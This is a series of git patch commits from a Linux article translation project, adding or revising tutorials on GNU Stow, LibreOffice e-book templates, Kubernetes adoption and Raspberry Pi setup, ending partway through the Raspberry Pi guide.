+How to use GNU Stow to manage programs installed from source and dotfiles
+======
+
+### Objective
+
+Easily manage programs installed from source and dotfiles using GNU stow
+
+### Requirements
+
+ * Root permissions
+
+
+
+### Difficulty
+
+EASY
+
+### Conventions
+
+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+Sometimes we have to install programs from source: maybe they are not available through standard channels, or maybe we want a specific version of a piece of software. GNU stow is a very nice `symlink factory` program which helps us a lot by keeping files organized in a very clean and easy-to-maintain way.
+
+### Obtaining stow
+
+Your distribution's repositories are very likely to contain `stow`. For example, in Fedora, all you have to do to install it is:
+```
+# dnf install stow
+```
+
+or on Ubuntu/Debian you can install stow by executing:
+```
+
+# apt install stow
+
+```
+
+In some distributions, stow is not available in the standard repositories, but it can be easily obtained by adding some extra software sources (for example EPEL in the case of RHEL and CentOS 7) or, as a last resort, by compiling it from source: it has very few dependencies.
+
+### Compiling stow from source
+
+The latest available stow version is `2.2.2`; the tarball is available for download here: `https://ftp.gnu.org/gnu/stow/`.
+
+Once you have downloaded the sources, you must extract the tarball. Navigate to the directory where you downloaded the package and simply run:
+```
+$ tar -xvpzf stow-2.2.2.tar.gz
+```
+
+After the sources have been extracted, navigate inside the stow-2.2.2 directory, and to compile the program simply run:
+```
+
+$ ./configure
+$ make
+
+```
+
+Finally, to install the package:
+```
+# make install
+```
+
+By default the package will be installed in the `/usr/local/` directory, but we can change this by specifying the directory via the `--prefix` option of the configure script, or by adding `prefix="/your/dir"` when running the `make install` command.
+
+At this point, if all worked as expected, we should have `stow` installed on our system.
+
+### How does stow work?
+
+The main concept behind stow is very well explained in the program manual:
+```
+
+The approach used by Stow is to install each package into its own tree,
+then use symbolic links to make it appear as though the files are
+installed in the common tree.
+
+```
+
+To better understand the working of the package, let's analyze its key concepts:
+
+#### The stow directory
+
+The stow directory is the root directory which contains all the `stow packages`, each with their own private subtree. The typical stow directory is `/usr/local/stow`: inside it, each subdirectory represents a `package`.
+
+#### Stow packages
+
+As said above, the stow directory contains "packages", each in its own separate subdirectory, usually named after the program itself. A package is nothing more than a list of files and directories related to a specific piece of software, managed as an entity.
+
+#### The stow target directory
+
+The stow target directory is a very simple concept to explain. It is the directory in which the package files must appear to be installed. By default, the stow target directory is considered to be the one above the directory from which stow is invoked. This behaviour can be easily changed by using the `-t` option (short for --target), which allows us to specify an alternative directory.
+
+### A practical example
+
+I believe a well-done example is worth 1000 words, so let's show how stow works. Suppose we want to compile and install `libx264`. Let's clone the git repository containing its sources:
+```
+$ git clone git://git.videolan.org/x264.git
+```
+
+A few seconds after running the command, the "x264" directory will be created, and it will contain the sources, ready to be compiled. We now navigate inside it and run the `configure` script, specifying the /usr/local/stow/libx264 directory as the `--prefix`:
+```
+$ cd x264 && ./configure --prefix=/usr/local/stow/libx264
+```
+
+Then we build the program and install it:
+```
+
+$ make
+# make install
+
+```
+
+The libx264 directory should have been created inside the stow directory: it contains all the files that would normally have been installed directly into the system. Now, all we have to do is invoke stow. We must run the command either from inside the stow directory or use the `-d` option to manually specify the path to the stow directory (the default is the current directory); we can also specify the target with `-t` as said before. We should also provide the name of the package to be stowed as an argument. In this case we run the program from the stow directory, so all we need to type is:
+```
+# stow libx264
+```
+
+All the files and directories contained in the libx264 package have now been symlinked into the parent directory (/usr/local) of the one from which stow has been invoked, so that, for example, the libx264 binaries contained in `/usr/local/stow/libx264/bin` are now symlinked in `/usr/local/bin`, files contained in `/usr/local/stow/libx264/etc` are now symlinked in `/usr/local/etc`, and so on. This way it will appear to the system that the files were installed normally, and we can easily keep track of each program we compile and install. To revert the action, we just use the `-D` option:
+```
+# stow -D libx264
+```
+
+It is done! The symlinks don't exist anymore: we just "uninstalled" a stow package, keeping our system in a clean and consistent state. At this point it should be clear why stow is also used to manage dotfiles. A common practice is to have all user-specific configuration files inside a git repository, to manage them easily and have them available everywhere, and then to use stow to place them where appropriate, in the user's home directory.
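+
+A minimal sketch of that workflow, assuming a hypothetical `~/dotfiles` git repository containing a `bash` package that holds files such as `.bashrc`, could look like this:
+```
+$ cd ~/dotfiles              # the repository acts as the stow directory
+$ stow -t ~ bash             # symlink the files of the "bash" package into the home directory
+$ stow -D -t ~ bash          # remove those symlinks again
+```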
+
+Stow will also prevent you from overwriting files by mistake: it will refuse to create symbolic links if the destination file already exists and doesn't point to a package in the stow directory. This situation is called a conflict in stow terminology.
+
+That's it! For a complete list of options, please consult the stow manpage and don't forget to tell us your opinions about it in the comments.
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/how-to-use-gnu-stow-to-manage-programs-installed-from-source-and-dotfiles
+
+作者:[Egidio Docile][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
From 2c76e51a2e4c853d53c25360bfd9d3b7c3638806 Mon Sep 17 00:00:00 2001
From: zjon
Date: Sat, 6 Jan 2018 13:49:08 +0800
Subject: [PATCH 089/371] zjon translating
---
sources/tech/20171011 What is a firewall.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index fe1142b8a4..ebc921cc3e 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,3 +1,4 @@
+Tranlating by zjon
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
@@ -77,3 +78,5 @@ via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-per
[a]:https://www.networkworld.com/author/Brandon-Butler/
[1]:https://www.networkworld.com/article/3236448/lan-wan/what-to-consider-when-deploying-a-next-generation-firewall.html
+
+
From 8bfbf6afd657ae8b2c624116956b8c8e56436af6 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:53:38 -0600
Subject: [PATCH 090/371] zjon translating
---
sources/tech/20171011 What is a firewall.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index ebc921cc3e..4e82483b58 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,4 @@
-Tranlating by zjon
+Translating by zjontranslating
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 74a70225559621a5fc1acb6767b0bd491c6b3fc5 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:54:36 -0600
Subject: [PATCH 091/371] Update 20171011 What is a firewall.md
---
sources/tech/20171011 What is a firewall.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 4e82483b58..3b7b90c4fe 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,4 @@
-Translating by zjontranslating
+Translating by zjon
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 30559da4e8cdcbd0c9b43a0d5d16c18a940555a6 Mon Sep 17 00:00:00 2001
From: jon
Date: Fri, 5 Jan 2018 23:55:02 -0600
Subject: [PATCH 092/371] Update 20171011 What is a firewall.md
---
sources/tech/20171011 What is a firewall.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 3b7b90c4fe..3401995721 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,4 +1,5 @@
Translating by zjon
+
What is a firewall?
======
Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
From 08f6d9866425fb60ea43f28607946c2677be9d8c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:55:16 +0800
Subject: [PATCH 093/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20create?=
=?UTF-8?q?=20an=20e-book=20chapter=20template=20in=20LibreOffice=20Writer?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... chapter template in LibreOffice Writer.md | 123 ++++++++++++++++++
1 file changed, 123 insertions(+)
create mode 100644 sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
diff --git a/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
new file mode 100644
index 0000000000..7b0a5bd1c5
--- /dev/null
+++ b/sources/tech/20171018 How to create an e-book chapter template in LibreOffice Writer.md
@@ -0,0 +1,123 @@
+How to create an e-book chapter template in LibreOffice Writer
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC)
+For many people, using a word processor is the fastest, easiest, and most familiar way to write and publish an e-book. But firing up your word processor and typing away isn't enough--you need to follow a format.
+
+That's where a template comes in. A template ensures that your book has a consistent look and feel. Luckily, creating a template is quick and easy, and the time and effort you spend on it will give you a better-looking book.
+
+In this article, I'll walk you through how to create a simple template for writing individual chapters of an e-book using LibreOffice Writer. You can use this template for both PDF and EPUB books and modify it to suit your needs.
+
+### My approach
+
+Why am I focusing on creating a template for a chapter rather than one for an entire book? Because it's easier to write and manage individual chapters than it is to work on a single monolithic document.
+
+By focusing on individual chapters, you can focus on what you need to write. You can easily move those chapters around, and it's less cumbersome to send a reviewer a single chapter rather than your full manuscript. When you've finished writing the chapters, you can simply stitch them together to publish the book (I'll discuss how to do that below). But don't feel that you're stuck with this approach--if you prefer to write in a single file, simply adapt the steps described in this article accordingly.
+
+Let's get started.
+
+### Setting up the page
+
+This is important only if you plan to publish your e-book as a PDF. Setting up the page means your book won't be just a mass of eye-straining text running across the screen.
+
+Select **Format > Page** to open the **Page Style** window. My PDF e-books are usually 5x8 inches (about 13x20 cm, for those of us in the metric world). I also set the margins to half an inch (around 1.25 cm). These are my preferred dimensions; use whatever size suits you.
+
+![LibreOffice Page Style window][2]
+
+
+The Page Style window in LibreOffice Writer lets you set margins and format the page.
+
+Next, add a footer to display a page number. Keep the Page Style window open and click the **Footer** tab. Select **Footer on** and click **OK**.
+
+On the page, click in the footer, then select **Insert > Field > Page Number**. Don't worry about the position and appearance of the page number; we'll take care of that next.
+
+### Setting up your styles
+
+Like the template itself, styles provide a consistent look and feel for your documents. If you want to change the font or the size of a heading, for example, you only need to do it in one place rather than manually applying formatting to each heading.
+
+The standard LibreOffice template comes with a number of styles that you can fiddle with to suit your needs. To do that, press **F11** to open the **Styles and Formatting** window.
+
+
+![LibreOffice styles and formatting][4]
+
+
+Change fonts and other details using the Styles and Formatting window.
+
+Right-click on a style and select **Modify** to edit it. Here are the main styles that I use in every book I write:
+
+| Style | Font | Spacing/Alignment |
+| ----- | ---- | ----------------- |
+| Heading 1 | Liberation Sans, 36 pt | 36 pt above, 48 pt below, aligned left |
+| Heading 2 | Liberation Sans, 18 pt | 12 pt above, 12 pt below, aligned left |
+| Heading 3 | Liberation Sans, 14 pt | 12 pt above, 12 pt below, aligned left |
+| Text Body | Liberation Sans, 12 pt | 12 pt above, 12 pt below, aligned left |
+| Footer | Liberation Sans, 10 pt | Aligned center |
+
+
+![LibreOffice styles in action][6]
+
+
+Here's what a selected style looks like when applied to ebook content.
+
+That's usually the bare minimum you need for most books. Feel free to change the fonts and spacing to suit your needs.
+
+Depending on the type of book you're writing, you might also want to create or modify styles for bullet and number lists, quotes, code samples, figures, etc. Just remember to use fonts and their sizes consistently.
+
+### Saving your template
+
+Select **File > Save As**. In the Save dialog box, select _ODF Text Document Template (.ott)_ from the formats list. This saves the document as a template, which you'll be able to quickly call up later.
+
+The best place to save it is in your LibreOffice templates folder. In Linux, for example, that's in your home directory, under **.config/libreoffice/4/user/template**.
+
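+If you prefer the terminal, a quick sketch of putting the template in place might look like this (the file name `chapter-template.ott` and its location in Downloads are just examples):
+```
+$ mkdir -p ~/.config/libreoffice/4/user/template
+$ cp ~/Downloads/chapter-template.ott ~/.config/libreoffice/4/user/template/
+```
+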
+### Writing your book
+
+Before you start writing, create a folder on your computer that will hold all the files--chapters, images, notes, etc.--for your book.
+
+When you're ready to write, fire up LibreOffice Writer and select **File > New > Templates**. Then select your template from the list and click **Open**.
+
+
+![LibreOffice Writer template list][8]
+
+
+Select your template from the list you set up in LibreOffice Writer and begin writing.
+
+Then save the document with a descriptive name.
+
+Avoid naming the files just _Chapter 1_ and _Chapter 2_ --at some point, you might decide to shuffle your chapters around, and it can get confusing when you're trying to manage them. You could, however, include a chapter number, like _Chapter 1_ or _Ch1_, in the file name. It's easier to rename a file like that if you do wind up rearranging the chapters of your book.
+
+With that out of the way, start writing. Remember to use the styles in the template to format the text--that's why you created the template, right?
+
+### Publishing your e-book
+
+Once you've finished writing a bunch of chapters and are ready to publish them, create a master document. Think of a master document as a container for the chapters you've written. Using a master document, you can quickly assemble your book and rearrange your chapters at will. The LibreOffice help offers detailed instructions for working with [master documents][9].
+
+Assuming you want to generate a PDF, don't just click the **Export Directly to PDF** button. That will create a decent PDF, but you might want to optimize it. To do that, select **File > Export as PDF** and tweak the settings in the PDF options window. You can learn more about that in the [LibreOffice Writer documentation][10].
+
+If you want to create an EPUB instead of, or in addition to, a PDF, install the [Writer2EPUB][11] extension. Opensource.com's Bryan Behrenshausen [shares some useful instructions][12] for the extension.
+
+### Final thoughts
+
+The template we've created here is bare-bones, but you can use it for a simple book, or as the starting point for building a more complex template. Either way, this template will quickly get you started writing and publishing your e-book.
+
+### About The Author
+Scott Nesbitt - I'm a long-time user of free and open source software, and I write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/creating-ebook-chapter-template-libreoffice-writer
+
+作者:[Scott Nesbitt][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/scottnesbitt
+[1]:/file/374456
+[2]:https://opensource.com/sites/default/files/images/life-uploads/lo-page-style.png (LibreOffice Page Style window)
+[3]:/file/374461
+[4]:https://opensource.com/sites/default/files/images/life-uploads/lo-paragraph-style.png (LibreOffice styles and formatting window)
+[5]:/file/374466
+[6]:https://opensource.com/sites/default/files/images/life-uploads/lo-styles-in-action.png (Example of LibreOffice styles)
+[7]:/file/374471
+[8]:https://opensource.com/sites/default/files/images/life-uploads/lo-template-list.png (Template list - LibreOffice Writer)
+[9]:https://help.libreoffice.org/Writer/Working_with_Master_Documents_and_Subdocuments
+[10]:https://help.libreoffice.org/Common/Export_as_PDF
+[11]:http://writer2epub.it/en/
+[12]:https://opensource.com/life/13/8/how-create-ebook-open-source-way
From 8c40343c4307bc570eb2a4c75d3383499f9a5665 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 14:35:24 +0800
Subject: [PATCH 094/371] =?UTF-8?q?PRF:20171120=20Adopting=20Kubernetes=20?=
=?UTF-8?q?step=20by=C2=A0step.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@aiwhj
---
...171120 Adopting Kubernetes step by step.md | 67 +++++++++----------
1 file changed, 32 insertions(+), 35 deletions(-)
diff --git a/translated/tech/20171120 Adopting Kubernetes step by step.md b/translated/tech/20171120 Adopting Kubernetes step by step.md
index 3e9015d155..8471ca85fe 100644
--- a/translated/tech/20171120 Adopting Kubernetes step by step.md
+++ b/translated/tech/20171120 Adopting Kubernetes step by step.md
@@ -1,80 +1,77 @@
一步步采用 Kubernetes
============================================================
-为什么选择 Docker 和 Kubernetes 呢?
+### 为什么选择 Docker 和 Kubernetes 呢?
-容器允许我们构建,发布和运行分布式应用。他们使应用程序摆脱了机器限制,让我们以一定的方式创建一个复杂的应用程序。
+容器允许我们构建、发布和运行分布式应用。它们使应用程序摆脱了机器限制,可以让我们以一定的方式创建一个复杂的应用程序。
-使用容器编写应用程序可以使开发,QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
+使用容器编写应用程序可以使开发、QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
-[Docker][1] 可以使软件独立于云提供商的容器化平台。
+[Docker][1] 这个容器式平台就是为此为生,可以使软件独立于云提供商。
-但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是非常重要的。应用程序通常需要自动伸缩组,持久远程光盘,自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
+但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是不可忽视的。应用程序通常需要自动伸缩组、持久远程磁盘、自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
-这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理,缩放和部署应用程序的不同部分,并且成为其中的重要工具。它抽象出来以兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
+这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理、缩放和部署应用程序的不同部分,并且成为其中的重要工具。它的可移植抽象层兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
-通过一个方法来想象一下应用程序,容器和 Kubernetes 。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护... 这正是应用 Kubernetes 集群的地方。
+可以这样想象一下应用程序、容器和 Kubernetes。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会被打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护……这正是应用 Kubernetes 集群的作用。
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
-Evolution to Kubernetes
-Kubernetes 由云提供商提供支持,从开发到生产,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件,服务或另外一些基础设施。
+*进化到 Kubernetes*
+
+主流云提供商对 Kubernetes 提供了支持,从开发环境到生产环境,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件、服务或基础设施。
事实上,您可以在您的机器中使用与生产环境相同的部件启动应用程序,从而缩小了开发和生产环境之间的差距。这使得开发人员更了解应用程序是如何构建在一起的,尽管他们可能只负责应用程序的一部分。这也使得在开发流程中的应用程序更容易的快速完成测试。
-如何使用 Kubernetes 工作?
+### 如何使用 Kubernetes 工作?
-随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境开发?假设有 3 个环境,开发,质量保证和生产, 如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在正在运行的应用程序中看到修改代码所花费的时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)
+随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境进行开发?假设有 3 个环境,开发、质量保证和生产, 他们如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在运行中的应用程序中我的代码的变化上花费时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)。
-那么,我是否应该总是在 Kubernetes 集群中编码,构建映像,重新部署服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群的其中之一(或一组集群)呢?还是,我应该以混合方式工作?
+那么,我是否应该总是在 Kubernetes 集群中编码、构建映像、重新部署服务,在我编写代码时重新创建部署和服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群(或一组集群)呢?还是,我应该以混合方式工作?
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
-Development with a local cluster
-如果继续我们之前的比喻,使其保持在一个开发集群中的同时侧面的通道代表着修改应用程序的一种方式。这通常通过[volumes][4]来实现
+*用本地集群进行开发*
-一个 Kubernetes 系列
+如果继续我们之前的比喻,上图两边的洞表示当使其保持在一个开发集群中的同时修改应用程序的一种方式。这通常通过[卷][4]来实现
-Kubernetes 系列资源是开源的,可以在这里找到:
+### Kubernetes 系列
-### [https://github.com/red-gate/ks][5]
+本 Kubernetes 系列资源是开源的,可以在这里找到: [https://github.com/red-gate/ks][5] 。
-我们写这个系列作为练习以不同的方式构建软件。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
+我们写这个系列作为以不同的方式构建软件的练习。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
-这个系列从使用 Kubernetes 创建基本的React应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
+这个系列从使用 Kubernetes 创建基本的 React 应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
以下是这个系列的前 5 部分:
-1. ks1: 使用 Kubernetes 构建一个React应用程序
+1. ks1:使用 Kubernetes 构建一个 React 应用程序
+2. ks2:使用 minikube 检测 React 代码的更改
+3. ks3:添加一个提供 API 的 Python Web 服务器
+4. ks4:使 minikube 检测 Python 代码的更改
+5. ks5:创建一个测试环境
-2. ks2: 使用 minikube 检测 React 代码的更改
+本系列的第二部分将添加一个数据库,并尝试找出最好的方式来开发我们的应用程序。
-3. ks3: 添加一个提供 API 的 Python Web 服务器
+通过在各种环境中运行 Kubernetes,我们被迫在解决新问题的同时也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
-4. ks4: 使 minikube 检测 Python 代码的更改
-
-5. ks5: 创建一个测试环境
-
-本系列的第二部分将添加一个数据库,并尝试找出最好的方式来发展我们的应用程序。
-
-
-通过在所有环境中运行 Kubernetes,我们被迫在解决新问题的时候也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
-
-下一步是什么?
+### 下一步是什么?
我们将通过整合数据库和练习来继续这个系列,以找到使用 Kubernetes 获得数据库生命周期的最佳体验方法。
-这个 Kubernetes 系列是由 Redgate 研发部门的 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
+这个 Kubernetes 系列是由 Redgate 研发部门 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
+
* * *
-我们正在招聘。您是否有兴趣开发产品,创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
+我们正在招聘。您是否有兴趣开发产品、创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
+
--------------------------------------------------------------------------------
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
作者:[santiago arias][a]
译者:[aiwhj](https://github.com/aiwhj)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b21c0b42990f8790919278fb195371d3fe15e542 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 14:35:49 +0800
Subject: [PATCH 095/371] =?UTF-8?q?PUB:20171120=20Adopting=20Kubernetes=20?=
=?UTF-8?q?step=20by=C2=A0step.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@aiwhj https://linux.cn/article-9208-1.html
---
.../20171120 Adopting Kubernetes step by step.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171120 Adopting Kubernetes step by step.md (100%)
diff --git a/translated/tech/20171120 Adopting Kubernetes step by step.md b/published/20171120 Adopting Kubernetes step by step.md
similarity index 100%
rename from translated/tech/20171120 Adopting Kubernetes step by step.md
rename to published/20171120 Adopting Kubernetes step by step.md
From c704c7e2d22e2354f318dce053b45620f4230f97 Mon Sep 17 00:00:00 2001
From: XiaochenCui
Date: Sat, 6 Jan 2018 15:57:25 +0800
Subject: [PATCH 096/371] Remove translating information
Due to my personal ability, I can not translate the origional meaning
well. So I asked for the article to be forwarded to others.
---
sources/tech/20171211 A tour of containerd 1.0.md | 2 --
1 file changed, 2 deletions(-)
diff --git a/sources/tech/20171211 A tour of containerd 1.0.md b/sources/tech/20171211 A tour of containerd 1.0.md
index 64f4c1dbde..4cf3e2b587 100644
--- a/sources/tech/20171211 A tour of containerd 1.0.md
+++ b/sources/tech/20171211 A tour of containerd 1.0.md
@@ -1,7 +1,5 @@
A tour of containerd 1.0
======
-XiaochenCui translating
-
![containerd][1]
We have done a few talks in the past on different features of containerd, how it was designed, and some of the problems that we have fixed along the way. Containerd is used by Docker, Kubernetes CRI, and a few other projects but this is a post for people who may not know what containerd actually does within these platforms. I would like to do more posts on the feature set and design of containerd in the future but for now, we will start with the basics.
From fe5b1a6d04d7dfd68d2ed96453a4ac34aeae058f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:44:02 +0800
Subject: [PATCH 097/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20beginner?=
=?UTF-8?q?=E2=80=99s=20guide=20to=20Raspberry=20Pi=203?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...02 A beginner-s guide to Raspberry Pi 3.md | 114 ++++++++++++++++++
1 file changed, 114 insertions(+)
create mode 100644 sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
new file mode 100644
index 0000000000..1cc43f9627
--- /dev/null
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -0,0 +1,114 @@
+A beginner’s guide to Raspberry Pi 3
+======
+![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
+This article is part of a weekly series where I'll create new projects using the Raspberry Pi 3. The first article of the series focuses on getting you started; it covers the installation of Raspbian with the PIXEL desktop, setting up networking, and some basics.
+
+### What you need:
+
+ * A Raspberry Pi 3
+ * A 5V 2A power supply with a micro USB connector
+ * Micro SD card with at least 8GB capacity
+ * Wi-Fi or Ethernet cable
+ * Heat sink
+ * Keyboard and mouse
+ * A PC monitor
+ * A Mac or PC to prepare the microSD card.
+
+
+
+There are many Linux-based operating systems available for Raspberry Pi that you can install directly, but if you're new to the Pi, I suggest NOOBS, the official OS installer for Raspberry Pi that simplifies the process of installing an OS on the device.
+
+Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
+
+
+If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
+
+`$ unzip NOOBS.zip`
+
+Irrespective of the operating system, open the unzipped file and check if the file structure looks like this:
+
+![content][3] Swapnil Bhartiya
+
+Now plug the Micro SD card into your PC and format it with the FAT32 file system. On MacOS, use the Disk Utility tool and format the Micro SD card:
+
+![format][4] Swapnil Bhartiya
+
+On Windows, just right click on the card and choose the formatting option. If you're on desktop Linux, different DEs use different tools, and covering all the DEs is beyond the scope of this story. I have written a tutorial [using the command line interface on Linux][5] to format an SD card with the FAT32 file system.
+
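+If you prefer the terminal, a minimal sketch of that approach looks like this (assuming the card shows up as `/dev/sdX`; double-check the device name with `lsblk` before formatting anything):
+```
+$ lsblk                           # identify the SD card, e.g. /dev/sdX
+$ sudo mkfs.vfat -F 32 /dev/sdX1  # format the first partition as FAT32
+```
+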
+Once you have the card formatted with a FAT32 partition, just copy the content of the downloaded NOOBS directory into the root directory of the device. If you are on MacOS or Linux, just rsync the content of NOOBS to the SD card. Open the Terminal app in MacOS or Linux and run the rsync command in this format:
+
